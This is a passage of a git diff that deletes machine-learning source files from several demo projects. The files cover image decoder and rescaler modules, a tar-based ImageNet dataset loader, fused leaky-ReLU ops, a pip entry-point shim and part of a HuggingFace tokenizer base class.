self.up[i_level].attn[i_block](h) - if i_level != 0: - h = self.up[i_level].upsample(h) - - # end - if self.give_pre_end: - return h - - h = self.norm_out(h) - h = nonlinearity(h) - h = self.conv_out(h) - if self.tanh_out: - h = torch.tanh(h) - return h - - -class SimpleDecoder(nn.Module): - def __init__(self, in_channels, out_channels, *args, **kwargs): - super().__init__() - self.model = nn.ModuleList([nn.Conv2d(in_channels, in_channels, 1), - ResnetBlock(in_channels=in_channels, - out_channels=2 * in_channels, - temb_channels=0, dropout=0.0), - ResnetBlock(in_channels=2 * in_channels, - out_channels=4 * in_channels, - temb_channels=0, dropout=0.0), - ResnetBlock(in_channels=4 * in_channels, - out_channels=2 * in_channels, - temb_channels=0, dropout=0.0), - nn.Conv2d(2*in_channels, in_channels, 1), - Upsample(in_channels, with_conv=True)]) - # end - self.norm_out = Normalize(in_channels) - self.conv_out = torch.nn.Conv2d(in_channels, - out_channels, - kernel_size=3, - stride=1, - padding=1) - - def forward(self, x): - for i, layer in enumerate(self.model): - if i in [1,2,3]: - x = layer(x, None) - else: - x = layer(x) - - h = self.norm_out(x) - h = nonlinearity(h) - x = self.conv_out(h) - return x - - -class UpsampleDecoder(nn.Module): - def __init__(self, in_channels, out_channels, ch, num_res_blocks, resolution, - ch_mult=(2,2), dropout=0.0): - super().__init__() - # upsampling - self.temb_ch = 0 - self.num_resolutions = len(ch_mult) - self.num_res_blocks = num_res_blocks - block_in = in_channels - curr_res = resolution // 2 ** (self.num_resolutions - 1) - self.res_blocks = nn.ModuleList() - self.upsample_blocks = nn.ModuleList() - for i_level in range(self.num_resolutions): - res_block = [] - block_out = ch * ch_mult[i_level] - for i_block in range(self.num_res_blocks + 1): - res_block.append(ResnetBlock(in_channels=block_in, - out_channels=block_out, - temb_channels=self.temb_ch, - dropout=dropout)) - block_in = block_out - self.res_blocks.append(nn.ModuleList(res_block)) - if i_level != self.num_resolutions - 1: - self.upsample_blocks.append(Upsample(block_in, True)) - curr_res = curr_res * 2 - - # end - self.norm_out = Normalize(block_in) - self.conv_out = torch.nn.Conv2d(block_in, - out_channels, - kernel_size=3, - stride=1, - padding=1) - - def forward(self, x): - # upsampling - h = x - for k, i_level in enumerate(range(self.num_resolutions)): - for i_block in range(self.num_res_blocks + 1): - h = self.res_blocks[i_level][i_block](h, None) - if i_level != self.num_resolutions - 1: - h = self.upsample_blocks[k](h) - h = self.norm_out(h) - h = nonlinearity(h) - h = self.conv_out(h) - return h - - -class LatentRescaler(nn.Module): - def __init__(self, factor, in_channels, mid_channels, out_channels, depth=2): - super().__init__() - # residual block, interpolate, residual block - self.factor = factor - self.conv_in = nn.Conv2d(in_channels, - mid_channels, - kernel_size=3, - stride=1, - padding=1) - self.res_block1 = nn.ModuleList([ResnetBlock(in_channels=mid_channels, - out_channels=mid_channels, - temb_channels=0, - dropout=0.0) for _ in range(depth)]) - self.attn = AttnBlock(mid_channels) - self.res_block2 = nn.ModuleList([ResnetBlock(in_channels=mid_channels, - out_channels=mid_channels, - temb_channels=0, - dropout=0.0) for _ in range(depth)]) - - self.conv_out = nn.Conv2d(mid_channels, - out_channels, - kernel_size=1, - ) - - def forward(self, x): - x = self.conv_in(x) - for block in self.res_block1: - x = block(x, None) - x = torch.nn.functional.interpolate(x, size=(int(round(x.shape[2]*self.factor)), int(round(x.shape[3]*self.factor)))) - x = self.attn(x) - for block in self.res_block2: - x = block(x, None) - x = self.conv_out(x) - return x - - -class MergedRescaleEncoder(nn.Module): - def __init__(self, in_channels, ch, resolution, out_ch, num_res_blocks, - attn_resolutions, dropout=0.0, resamp_with_conv=True, - ch_mult=(1,2,4,8), rescale_factor=1.0, rescale_module_depth=1): - super().__init__() - intermediate_chn = ch * ch_mult[-1] - self.encoder = Encoder(in_channels=in_channels, num_res_blocks=num_res_blocks, ch=ch, ch_mult=ch_mult, - z_channels=intermediate_chn, double_z=False, resolution=resolution, - attn_resolutions=attn_resolutions, dropout=dropout, resamp_with_conv=resamp_with_conv, - out_ch=None) - self.rescaler = LatentRescaler(factor=rescale_factor, in_channels=intermediate_chn, - mid_channels=intermediate_chn, out_channels=out_ch, depth=rescale_module_depth) - - def forward(self, x): - x = self.encoder(x) - x = self.rescaler(x) - return x - - -class MergedRescaleDecoder(nn.Module): - def __init__(self, z_channels, out_ch, resolution, num_res_blocks, attn_resolutions, ch, ch_mult=(1,2,4,8), - dropout=0.0, resamp_with_conv=True, rescale_factor=1.0, rescale_module_depth=1): - super().__init__() - tmp_chn = z_channels*ch_mult[-1] - self.decoder = Decoder(out_ch=out_ch, z_channels=tmp_chn, attn_resolutions=attn_resolutions, dropout=dropout, - resamp_with_conv=resamp_with_conv, in_channels=None, num_res_blocks=num_res_blocks, - ch_mult=ch_mult, resolution=resolution, ch=ch) - self.rescaler = LatentRescaler(factor=rescale_factor, in_channels=z_channels, mid_channels=tmp_chn, - out_channels=tmp_chn, depth=rescale_module_depth) - - def forward(self, x): - x = self.rescaler(x) - x = self.decoder(x) - return x - - -class Upsampler(nn.Module): - def __init__(self, in_size, out_size, in_channels, out_channels, ch_mult=2): - super().__init__() - assert out_size >= in_size - num_blocks = int(np.log2(out_size//in_size))+1 - factor_up = 1.+ (out_size % in_size) - print(f"Building {self.__class__.__name__} with in_size: {in_size} --> out_size {out_size} and factor {factor_up}") - self.rescaler = LatentRescaler(factor=factor_up, in_channels=in_channels, mid_channels=2*in_channels, - out_channels=in_channels) - self.decoder = Decoder(out_ch=out_channels, resolution=out_size, z_channels=in_channels, num_res_blocks=2, - attn_resolutions=[], in_channels=None, ch=in_channels, - ch_mult=[ch_mult for _ in range(num_blocks)]) - - def forward(self, x): - x = self.rescaler(x) - x = self.decoder(x) - return x - - -class Resize(nn.Module): - def __init__(self, in_channels=None, learned=False, mode="bilinear"): - super().__init__() - self.with_conv = learned - self.mode = mode - if self.with_conv: - print(f"Note: {self.__class__.__name} uses learned downsampling and will ignore the fixed {mode} mode") - raise NotImplementedError() - assert in_channels is not None - # no asymmetric padding in torch conv, must do it ourselves - self.conv = torch.nn.Conv2d(in_channels, - in_channels, - kernel_size=4, - stride=2, - padding=1) - - def forward(self, x, scale_factor=1.0): - if scale_factor==1.0: - return x - else: - x = torch.nn.functional.interpolate(x, mode=self.mode, align_corners=False, scale_factor=scale_factor) - return x \ No newline at end of file diff --git a/spaces/akhaliq/Detic/detic/data/tar_dataset.py b/spaces/akhaliq/Detic/detic/data/tar_dataset.py deleted file mode 100644 index 0605ba3a96ab80a1212fdb1a3860337d7e7b20cc..0000000000000000000000000000000000000000 --- a/spaces/akhaliq/Detic/detic/data/tar_dataset.py +++ /dev/null @@ -1,138 +0,0 @@ -#!/usr/bin/env python3 -# Copyright (c) Facebook, Inc. and its affiliates. -import os -import gzip -import numpy as np -import io -from PIL import Image -from torch.utils.data import Dataset - -try: - from PIL import UnidentifiedImageError - - unidentified_error_available = True -except ImportError: - # UnidentifiedImageError isn't available in older versions of PIL - unidentified_error_available = False - -class DiskTarDataset(Dataset): - def __init__(self, - tarfile_path='dataset/imagenet/ImageNet-21k/metadata/tar_files.npy', - tar_index_dir='dataset/imagenet/ImageNet-21k/metadata/tarindex_npy', - preload=False, - num_synsets="all"): - """ - - preload (bool): Recommend to set preload to False when using - - num_synsets (integer or string "all"): set to small number for debugging - will load subset of dataset - """ - tar_files = np.load(tarfile_path) - - chunk_datasets = [] - dataset_lens = [] - if isinstance(num_synsets, int): - assert num_synsets < len(tar_files) - tar_files = tar_files[:num_synsets] - for tar_file in tar_files: - dataset = _TarDataset(tar_file, tar_index_dir, preload=preload) - chunk_datasets.append(dataset) - dataset_lens.append(len(dataset)) - - self.chunk_datasets = chunk_datasets - self.dataset_lens = np.array(dataset_lens).astype(np.int32) - self.dataset_cumsums = np.cumsum(self.dataset_lens) - self.num_samples = sum(self.dataset_lens) - labels = np.zeros(self.dataset_lens.sum(), dtype=np.int64) - sI = 0 - for k in range(len(self.dataset_lens)): - assert (sI+self.dataset_lens[k]) <= len(labels), f"{k} {sI+self.dataset_lens[k]} vs. {len(labels)}" - labels[sI:(sI+self.dataset_lens[k])] = k - sI += self.dataset_lens[k] - self.labels = labels - - def __len__(self): - return self.num_samples - - def __getitem__(self, index): - assert index >= 0 and index < len(self) - # find the dataset file we need to go to - d_index = np.searchsorted(self.dataset_cumsums, index) - - # edge case, if index is at edge of chunks, move right - if index in self.dataset_cumsums: - d_index += 1 - - assert d_index == self.labels[index], f"{d_index} vs. {self.labels[index]} mismatch for {index}" - - # change index to local dataset index - if d_index == 0: - local_index = index - else: - local_index = index - self.dataset_cumsums[d_index - 1] - data_bytes = self.chunk_datasets[d_index][local_index] - exception_to_catch = UnidentifiedImageError if unidentified_error_available else Exception - try: - image = Image.open(data_bytes).convert("RGB") - except exception_to_catch: - image = Image.fromarray(np.ones((224,224,3), dtype=np.uint8)*128) - d_index = -1 - - # label is the dataset (synset) we indexed into - return image, d_index, index - - def __repr__(self): - st = f"DiskTarDataset(subdatasets={len(self.dataset_lens)},samples={self.num_samples})" - return st - -class _TarDataset(object): - - def __init__(self, filename, npy_index_dir, preload=False): - # translated from - # fbcode/experimental/deeplearning/matthijs/comp_descs/tardataset.lua - self.filename = filename - self.names = [] - self.offsets = [] - self.npy_index_dir = npy_index_dir - names, offsets = self.load_index() - - self.num_samples = len(names) - if preload: - self.data = np.memmap(filename, mode='r', dtype='uint8') - self.offsets = offsets - else: - self.data = None - - - def __len__(self): - return self.num_samples - - def load_index(self): - basename = os.path.basename(self.filename) - basename = os.path.splitext(basename)[0] - names = np.load(os.path.join(self.npy_index_dir, f"{basename}_names.npy")) - offsets = np.load(os.path.join(self.npy_index_dir, f"{basename}_offsets.npy")) - return names, offsets - - def __getitem__(self, idx): - if self.data is None: - self.data = np.memmap(self.filename, mode='r', dtype='uint8') - _, self.offsets = self.load_index() - - ofs = self.offsets[idx] * 512 - fsize = 512 * (self.offsets[idx + 1] - self.offsets[idx]) - data = self.data[ofs:ofs + fsize] - - if data[:13].tostring() == '././@LongLink': - data = data[3 * 512:] - else: - data = data[512:] - - # just to make it more fun a few JPEGs are GZIP compressed... - # catch this case - if tuple(data[:2]) == (0x1f, 0x8b): - s = io.BytesIO(data.tostring()) - g = gzip.GzipFile(None, 'r', 0, s) - sdata = g.read() - else: - sdata = data.tostring() - return io.BytesIO(sdata) \ No newline at end of file diff --git a/spaces/akhaliq/GPEN/face_model/op/fused_act.py b/spaces/akhaliq/GPEN/face_model/op/fused_act.py deleted file mode 100644 index 59db126ebcb59423cadd12baa830cbadce8b0292..0000000000000000000000000000000000000000 --- a/spaces/akhaliq/GPEN/face_model/op/fused_act.py +++ /dev/null @@ -1,96 +0,0 @@ -import os -import platform - -import torch -from torch import nn -import torch.nn.functional as F -from torch.autograd import Function -from torch.utils.cpp_extension import load, _import_module_from_library - -# if running GPEN without cuda, please comment line 11-19 -if platform.system() == 'Linux' and torch.cuda.is_available(): - module_path = os.path.dirname(__file__) - fused = load( - 'fused', - sources=[ - os.path.join(module_path, 'fused_bias_act.cpp'), - os.path.join(module_path, 'fused_bias_act_kernel.cu'), - ], - ) - - -#fused = _import_module_from_library('fused', '/tmp/torch_extensions/fused', True) - - -class FusedLeakyReLUFunctionBackward(Function): - @staticmethod - def forward(ctx, grad_output, out, negative_slope, scale): - ctx.save_for_backward(out) - ctx.negative_slope = negative_slope - ctx.scale = scale - - empty = grad_output.new_empty(0) - - grad_input = fused.fused_bias_act( - grad_output, empty, out, 3, 1, negative_slope, scale - ) - - dim = [0] - - if grad_input.ndim > 2: - dim += list(range(2, grad_input.ndim)) - - grad_bias = grad_input.sum(dim).detach() - - return grad_input, grad_bias - - @staticmethod - def backward(ctx, gradgrad_input, gradgrad_bias): - out, = ctx.saved_tensors - gradgrad_out = fused.fused_bias_act( - gradgrad_input, gradgrad_bias, out, 3, 1, ctx.negative_slope, ctx.scale - ) - - return gradgrad_out, None, None, None - - -class FusedLeakyReLUFunction(Function): - @staticmethod - def forward(ctx, input, bias, negative_slope, scale): - empty = input.new_empty(0) - out = fused.fused_bias_act(input, bias, empty, 3, 0, negative_slope, scale) - ctx.save_for_backward(out) - ctx.negative_slope = negative_slope - ctx.scale = scale - - return out - - @staticmethod - def backward(ctx, grad_output): - out, = ctx.saved_tensors - - grad_input, grad_bias = FusedLeakyReLUFunctionBackward.apply( - grad_output, out, ctx.negative_slope, ctx.scale - ) - - return grad_input, grad_bias, None, None - - -class FusedLeakyReLU(nn.Module): - def __init__(self, channel, negative_slope=0.2, scale=2 ** 0.5, device='cpu'): - super().__init__() - - self.bias = nn.Parameter(torch.zeros(channel)) - self.negative_slope = negative_slope - self.scale = scale - self.device = device - - def forward(self, input): - return fused_leaky_relu(input, self.bias, self.negative_slope, self.scale, self.device) - - -def fused_leaky_relu(input, bias, negative_slope=0.2, scale=2 ** 0.5, device='cpu'): - if platform.system() == 'Linux' and torch.cuda.is_available() and device != 'cpu': - return FusedLeakyReLUFunction.apply(input, bias, negative_slope, scale) - else: - return scale * F.leaky_relu(input + bias.view((1, -1)+(1,)*(len(input.shape)-2)), negative_slope=negative_slope) diff --git a/spaces/alexray/btc_predictor/venv/lib/python3.10/site-packages/pip/_internal/main.py b/spaces/alexray/btc_predictor/venv/lib/python3.10/site-packages/pip/_internal/main.py deleted file mode 100644 index 33c6d24cd85b55a9fb1b1e6ab784f471e2b135f0..0000000000000000000000000000000000000000 --- a/spaces/alexray/btc_predictor/venv/lib/python3.10/site-packages/pip/_internal/main.py +++ /dev/null @@ -1,12 +0,0 @@ -from typing import List, Optional - - -def main(args: Optional[List[str]] = None) -> int: - """This is preserved for old console scripts that may still be referencing - it. - - For additional details, see https://github.com/pypa/pip/issues/7498. - """ - from pip._internal.utils.entrypoints import _wrapper - - return _wrapper(args) diff --git a/spaces/aliabd/SummerTime/model/third_party/HMNet/ThirdParty/Huggingface/Transformers/src/transformers/tokenization_utils.py b/spaces/aliabd/SummerTime/model/third_party/HMNet/ThirdParty/Huggingface/Transformers/src/transformers/tokenization_utils.py deleted file mode 100644 index 150d879c5cac5f762f11781294100a71811cb323..0000000000000000000000000000000000000000 --- a/spaces/aliabd/SummerTime/model/third_party/HMNet/ThirdParty/Huggingface/Transformers/src/transformers/tokenization_utils.py +++ /dev/null @@ -1,2166 +0,0 @@ -# coding=utf-8 -# Copyright 2018 The Open AI Team Authors and The HuggingFace Inc. team. -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. -"""Tokenization classes for OpenAI GPT.""" - -import copy -import itertools -import json -import logging -import os -import re -from collections import defaultdict -from contextlib import contextmanager -from typing import List, Optional, Tuple, Union - -from tokenizers.implementations import BaseTokenizer - -from .file_utils import ( - cached_path, - hf_bucket_url, - is_remote_url, - is_tf_available, - is_torch_available, -) - - -if is_tf_available(): - import tensorflow as tf -if is_torch_available(): - import torch - -logger = logging.getLogger(__name__) - -SPECIAL_TOKENS_MAP_FILE = "special_tokens_map.json" -ADDED_TOKENS_FILE = "added_tokens.json" -TOKENIZER_CONFIG_FILE = "tokenizer_config.json" - - -@contextmanager -def truncate_and_pad( - tokenizer: BaseTokenizer, - max_length: int, - stride: int, - strategy: str, - pad_to_max_length: bool, - padding_side: str, - pad_token_id: int, - pad_token_type_id: int, - pad_token: str, -): - """ - This contextmanager is in charge of defining the truncation and the padding strategies and then - restore the tokenizer settings afterwards. - - This contextmanager assumes the provider tokenizer has no padding / truncation strategy - before the managed section. If your tokenizer set a padding / truncation strategy before, - then it will be reset to no padding/truncation when exiting the managed section. - - :param tokenizer: - :param max_length: - :param stride: - :param strategy: - :param pad_to_max_length: - :param padding_side: - :param pad_token_id: - :param pad_token_type_id: - :param pad_token: - :return: - """ - - # Handle all the truncation and padding stuff - if max_length is not None: - tokenizer.enable_truncation(max_length, stride=stride, strategy=strategy) - - if pad_to_max_length and (pad_token and pad_token_id >= 0): - tokenizer.enable_padding( - max_length=max_length, - direction=padding_side, - pad_id=pad_token_id, - pad_type_id=pad_token_type_id, - pad_token=pad_token, - ) - elif pad_to_max_length: - logger.warning( - "Disabled padding because no padding token set (pad_token: {}, pad_token_id: {}).\n" - "To remove this error, you can add a new pad token and then resize model embedding:\n" - "\ttokenizer.pad_token = ''\n\tmodel.resize_token_embeddings(len(tokenizer))".format( - pad_token, pad_token_id - ) - ) - - yield - - if max_length is not None: - tokenizer.no_truncation() - - if pad_to_max_length and (pad_token and pad_token_id >= 0): - tokenizer.no_padding() - - -class PreTrainedTokenizer(object): - """Base class for all tokenizers. - Handle all the shared methods for tokenization and special tokens as well as methods downloading/caching/loading pretrained tokenizers as well as adding tokens to the vocabulary. - - This class also contain the added tokens in a unified way on top of all tokenizers so we don't have to handle the specific vocabulary augmentation methods of the various underlying dictionary structures (BPE, sentencepiece...). - - Class attributes (overridden by derived classes): - - - ``vocab_files_names``: a python ``dict`` with, as keys, the ``__init__`` keyword name of each vocabulary file required by the model, and as associated values, the filename for saving the associated file (string). - - ``pretrained_vocab_files_map``: a python ``dict of dict`` the high-level keys being the ``__init__`` keyword name of each vocabulary file required by the model, the low-level being the `short-cut-names` (string) of the pretrained models with, as associated values, the `url` (string) to the associated pretrained vocabulary file. - - ``max_model_input_sizes``: a python ``dict`` with, as keys, the `short-cut-names` (string) of the pretrained models, and as associated values, the maximum length of the sequence inputs of this model, or None if the model has no maximum input size. - - ``pretrained_init_configuration``: a python ``dict`` with, as keys, the `short-cut-names` (string) of the pretrained models, and as associated values, a dictionnary of specific arguments to pass to the ``__init__``method of the tokenizer class for this pretrained model when loading the tokenizer with the ``from_pretrained()`` method. - - Parameters: - - - ``bos_token``: (`Optional`) string: a beginning of sentence token. Will be associated to ``self.bos_token`` and ``self.bos_token_id`` - - - ``eos_token``: (`Optional`) string: an end of sentence token. Will be associated to ``self.eos_token`` and ``self.eos_token_id`` - - - ``unk_token``: (`Optional`) string: an unknown token. Will be associated to ``self.unk_token`` and ``self.unk_token_id`` - - - ``sep_token``: (`Optional`) string: a separation token (e.g. to separate context and query in an input sequence). Will be associated to ``self.sep_token`` and ``self.sep_token_id`` - - - ``pad_token``: (`Optional`) string: a padding token. Will be associated to ``self.pad_token`` and ``self.pad_token_id`` - - - ``cls_token``: (`Optional`) string: a classification token (e.g. to extract a summary of an input sequence leveraging self-attention along the full depth of the model). Will be associated to ``self.cls_token`` and ``self.cls_token_id`` - - - ``mask_token``: (`Optional`) string: a masking token (e.g. when training a model with masked-language modeling). Will be associated to ``self.mask_token`` and ``self.mask_token_id`` - - - ``additional_special_tokens``: (`Optional`) list: a list of additional special tokens. Adding all special tokens here ensure they won't be split by the tokenization process. Will be associated to ``self.additional_special_tokens`` and ``self.additional_special_tokens_ids`` - """ - - vocab_files_names = {} - pretrained_vocab_files_map = {} - pretrained_init_configuration = {} - max_model_input_sizes = {} - model_input_names = ["token_type_ids", "attention_mask"] - - SPECIAL_TOKENS_ATTRIBUTES = [ - "bos_token", - "eos_token", - "unk_token", - "sep_token", - "pad_token", - "cls_token", - "mask_token", - "additional_special_tokens", - ] - - padding_side = "right" - - NO_PAD_TOKEN_FOR_BATCH_MSG = ( - "No padding token is set for this model, therefore no batch can be made with uneven " - "sequences. Set a padding token or adjust the lengths of the sequences building the " - "batch so that every sequence is of the same length." - ) - - UNEVEN_SEQUENCES_FOR_BATCH_MSG = ( - "The sequences building the batch are not of the same size, no tensor " - "can be built. Set `pad_to_max_length=True` to pad the smaller sequences" - "up to the larger sequence's length." - ) - - @property - def bos_token(self): - """Beginning of sentence token (string). Log an error if used while not having been set.""" - if self._bos_token is None: - logger.error("Using bos_token, but it is not set yet.") - return self._bos_token - - @property - def eos_token(self): - """End of sentence token (string). Log an error if used while not having been set.""" - if self._eos_token is None: - logger.error("Using eos_token, but it is not set yet.") - return self._eos_token - - @property - def unk_token(self): - """Unknown token (string). Log an error if used while not having been set.""" - if self._unk_token is None: - logger.error("Using unk_token, but it is not set yet.") - return self._unk_token - - @property - def sep_token(self): - """Separation token (string). E.g. separate context and query in an input sequence. Log an error if used while not having been set.""" - if self._sep_token is None: - logger.error("Using sep_token, but it is not set yet.") - return self._sep_token - - @property - def pad_token(self): - """Padding token (string). Log an error if used while not having been set.""" - if self._pad_token is None: - logger.error("Using pad_token, but it is not set yet.") - return self._pad_token - - @property - def cls_token(self): - """Classification token (string). E.g. to extract a summary of an input sequence leveraging self-attention along the full depth of the model. Log an error if used while not having been set.""" - if self._cls_token is None: - logger.error("Using cls_token, but it is not set yet.") - return self._cls_token - - @property - def mask_token(self): - """Mask token (string). E.g. when training a model with masked-language modeling. Log an error if used while not having been set.""" - if self._mask_token is None: - logger.error("Using mask_token, but it is not set yet.") - return self._mask_token - - @property - def additional_special_tokens(self): - """All the additional special tokens you may want to use (list of strings). Log an error if used while not having been set.""" - if self._additional_special_tokens is None: - logger.error("Using additional_special_tokens, but it is not set yet.") - return self._additional_special_tokens - - @bos_token.setter - def bos_token(self, value): - self._bos_token = value - - @eos_token.setter - def eos_token(self, value): - self._eos_token = value - - @unk_token.setter - def unk_token(self, value): - self._unk_token = value - - @sep_token.setter - def sep_token(self, value): - self._sep_token = value - - @pad_token.setter - def pad_token(self, value): - self._pad_token = value - - @cls_token.setter - def cls_token(self, value): - self._cls_token = value - - @mask_token.setter - def mask_token(self, value): - self._mask_token = value - - @additional_special_tokens.setter - def additional_special_tokens(self, value): - self._additional_special_tokens = value - - @property - def bos_token_id(self): - """Id of the beginning of sentence token in the vocabulary. Log an error if used while not having been set.""" - return self.convert_tokens_to_ids(self.bos_token) - - @property - def eos_token_id(self): - """Id of the end of sentence token in the vocabulary. Log an error if used while not having been set.""" - return self.convert_tokens_to_ids(self.eos_token) - - @property - def unk_token_id(self): - """Id of the unknown token in the vocabulary. Log an error if used while not having been set.""" - return self.convert_tokens_to_ids(self.unk_token) - - @property - def sep_token_id(self): - """Id of the separation token in the vocabulary. E.g. separate context and query in an input sequence. Log an error if used while not having been set.""" - return self.convert_tokens_to_ids(self.sep_token) - - @property - def pad_token_id(self): - """Id of the padding token in the vocabulary. Log an error if used while not having been set.""" - return self.convert_tokens_to_ids(self.pad_token) - - @property - def pad_token_type_id(self): - """Id of the padding token type in the vocabulary.""" - return self._pad_token_type_id - - @property - def cls_token_id(self): - """Id of the classification token in the vocabulary. E.g. to extract a summary of an input sequence leveraging self-attention along the full depth of the model. Log an error if used while not having been set.""" - return self.convert_tokens_to_ids(self.cls_token) - - @property - def mask_token_id(self): - """Id of the mask token in the vocabulary. E.g. when training a model with masked-language modeling. Log an error if used while not having been set.""" - return self.convert_tokens_to_ids(self.mask_token) - - @property - def additional_special_tokens_ids(self): - """Ids of all the additional special tokens in the vocabulary (list of integers). Log an error if used while not having been set.""" - return self.convert_tokens_to_ids(self.additional_special_tokens) - - def get_vocab(self): - """Returns the vocabulary as a dict of {token: index} pairs. `tokenizer.get_vocab()[token]` is equivalent to `tokenizer.convert_tokens_to_ids(token)` when `token` is in the vocab.""" - raise NotImplementedError() - - def __init__(self, max_len=None, **kwargs): - self._bos_token = None - self._eos_token = None - self._unk_token = None - self._sep_token = None - self._pad_token = None - self._cls_token = None - self._mask_token = None - self._pad_token_type_id = 0 - self._additional_special_tokens = [] - - self.max_len = max_len if max_len is not None else int(1e12) - - # Padding side is right by default and over-riden in subclasses. If specified in the kwargs, it is changed. - self.padding_side = kwargs.pop("padding_side", self.padding_side) - self.model_input_names = kwargs.pop("model_input_names", self.model_input_names) - - # Added tokens - self.added_tokens_encoder = {} - self.unique_added_tokens_encoder = set() - self.added_tokens_decoder = {} - - # inputs and kwargs for saving and re-loading (see ``from_pretrained`` and ``save_pretrained``) - self.init_inputs = () - self.init_kwargs = {} - - for key, value in kwargs.items(): - if key in self.SPECIAL_TOKENS_ATTRIBUTES: - if key == "additional_special_tokens": - assert isinstance(value, (list, tuple)) and all( - isinstance(t, str) for t in value - ) - else: - assert isinstance(value, str) - setattr(self, key, value) - - @classmethod - def from_pretrained(cls, *inputs, **kwargs): - r""" - Instantiate a :class:`~transformers.PreTrainedTokenizer` (or a derived class) from a predefined tokenizer. - - Args: - pretrained_model_name_or_path: either: - - - a string with the `shortcut name` of a predefined tokenizer to load from cache or download, e.g.: ``bert-base-uncased``. - - a string with the `identifier name` of a predefined tokenizer that was user-uploaded to our S3, e.g.: ``dbmdz/bert-base-german-cased``. - - a path to a `directory` containing vocabulary files required by the tokenizer, for instance saved using the :func:`~transformers.PreTrainedTokenizer.save_pretrained` method, e.g.: ``./my_model_directory/``. - - (not applicable to all derived classes, deprecated) a path or url to a single saved vocabulary file if and only if the tokenizer only requires a single vocabulary file (e.g. Bert, XLNet), e.g.: ``./my_model_directory/vocab.txt``. - - cache_dir: (`optional`) string: - Path to a directory in which a downloaded predefined tokenizer vocabulary files should be cached if the standard cache should not be used. - - force_download: (`optional`) boolean, default False: - Force to (re-)download the vocabulary files and override the cached versions if they exists. - - resume_download: (`optional`) boolean, default False: - Do not delete incompletely recieved file. Attempt to resume the download if such a file exists. - - proxies: (`optional`) dict, default None: - A dictionary of proxy servers to use by protocol or endpoint, e.g.: {'http': 'foo.bar:3128', 'http://hostname': 'foo.bar:4012'}. - The proxies are used on each request. - - inputs: (`optional`) positional arguments: will be passed to the Tokenizer ``__init__`` method. - - kwargs: (`optional`) keyword arguments: will be passed to the Tokenizer ``__init__`` method. Can be used to set special tokens like ``bos_token``, ``eos_token``, ``unk_token``, ``sep_token``, ``pad_token``, ``cls_token``, ``mask_token``, ``additional_special_tokens``. See parameters in the doc string of :class:`~transformers.PreTrainedTokenizer` for details. - - Examples:: - - # We can't instantiate directly the base class `PreTrainedTokenizer` so let's show our examples on a derived class: BertTokenizer - - # Download vocabulary from S3 and cache. - tokenizer = BertTokenizer.from_pretrained('bert-base-uncased') - - # Download vocabulary from S3 (user-uploaded) and cache. - tokenizer = BertTokenizer.from_pretrained('dbmdz/bert-base-german-cased') - - # If vocabulary files are in a directory (e.g. tokenizer was saved using `save_pretrained('./test/saved_model/')`) - tokenizer = BertTokenizer.from_pretrained('./test/saved_model/') - - # If the tokenizer uses a single vocabulary file, you can point directly to this file - tokenizer = BertTokenizer.from_pretrained('./test/saved_model/my_vocab.txt') - - # You can link tokens to special vocabulary when instantiating - tokenizer = BertTokenizer.from_pretrained('bert-base-uncased', unk_token='') - # You should be sure '' is in the vocabulary when doing that. - # Otherwise use tokenizer.add_special_tokens({'unk_token': ''}) instead) - assert tokenizer.unk_token == '' - - """ - return cls._from_pretrained(*inputs, **kwargs) - - @classmethod - def _from_pretrained(cls, pretrained_model_name_or_path, *init_inputs, **kwargs): - cache_dir = kwargs.pop("cache_dir", None) - force_download = kwargs.pop("force_download", False) - resume_download = kwargs.pop("resume_download", False) - proxies = kwargs.pop("proxies", None) - local_files_only = kwargs.pop("local_files_only", False) - - s3_models = list(cls.max_model_input_sizes.keys()) - vocab_files = {} - init_configuration = {} - if pretrained_model_name_or_path in s3_models: - # Get the vocabulary from AWS S3 bucket - for file_id, map_list in cls.pretrained_vocab_files_map.items(): - vocab_files[file_id] = map_list[pretrained_model_name_or_path] - if ( - cls.pretrained_init_configuration - and pretrained_model_name_or_path in cls.pretrained_init_configuration - ): - init_configuration = cls.pretrained_init_configuration[ - pretrained_model_name_or_path - ].copy() - else: - # Get the vocabulary from local files - logger.info( - "Model name '{}' not found in model shortcut name list ({}). " - "Assuming '{}' is a path, a model identifier, or url to a directory containing tokenizer files.".format( - pretrained_model_name_or_path, - ", ".join(s3_models), - pretrained_model_name_or_path, - ) - ) - - if os.path.isfile(pretrained_model_name_or_path) or is_remote_url( - pretrained_model_name_or_path - ): - if len(cls.vocab_files_names) > 1: - raise ValueError( - "Calling {}.from_pretrained() with the path to a single file or url is not supported." - "Use a model identifier or the path to a directory instead.".format( - cls.__name__ - ) - ) - logger.warning( - "Calling {}.from_pretrained() with the path to a single file or url is deprecated".format( - cls.__name__ - ) - ) - file_id = list(cls.vocab_files_names.keys())[0] - vocab_files[file_id] = pretrained_model_name_or_path - else: - # At this point pretrained_model_name_or_path is either a directory or a model identifier name - additional_files_names = { - "added_tokens_file": ADDED_TOKENS_FILE, - "special_tokens_map_file": SPECIAL_TOKENS_MAP_FILE, - "tokenizer_config_file": TOKENIZER_CONFIG_FILE, - } - # Look for the tokenizer main vocabulary files + the additional tokens files - for file_id, file_name in { - **cls.vocab_files_names, - **additional_files_names, - }.items(): - if os.path.isdir(pretrained_model_name_or_path): - full_file_name = os.path.join( - pretrained_model_name_or_path, file_name - ) - if not os.path.exists(full_file_name): - logger.info( - "Didn't find file {}. We won't load it.".format( - full_file_name - ) - ) - full_file_name = None - else: - full_file_name = hf_bucket_url( - pretrained_model_name_or_path, postfix=file_name - ) - - vocab_files[file_id] = full_file_name - - # Get files from url, cache, or disk depending on the case - try: - resolved_vocab_files = {} - for file_id, file_path in vocab_files.items(): - if file_path is None: - resolved_vocab_files[file_id] = None - else: - resolved_vocab_files[file_id] = cached_path( - file_path, - cache_dir=cache_dir, - force_download=force_download, - proxies=proxies, - resume_download=resume_download, - local_files_only=local_files_only, - ) - except EnvironmentError: - if pretrained_model_name_or_path in s3_models: - msg = "Couldn't reach server at '{}' to download vocabulary files." - else: - msg = ( - "Model name '{}' was not found in tokenizers model name list ({}). " - "We assumed '{}' was a path or url to a directory containing vocabulary files " - "named {}, but couldn't find such vocabulary files at this path or url.".format( - pretrained_model_name_or_path, - ", ".join(s3_models), - pretrained_model_name_or_path, - 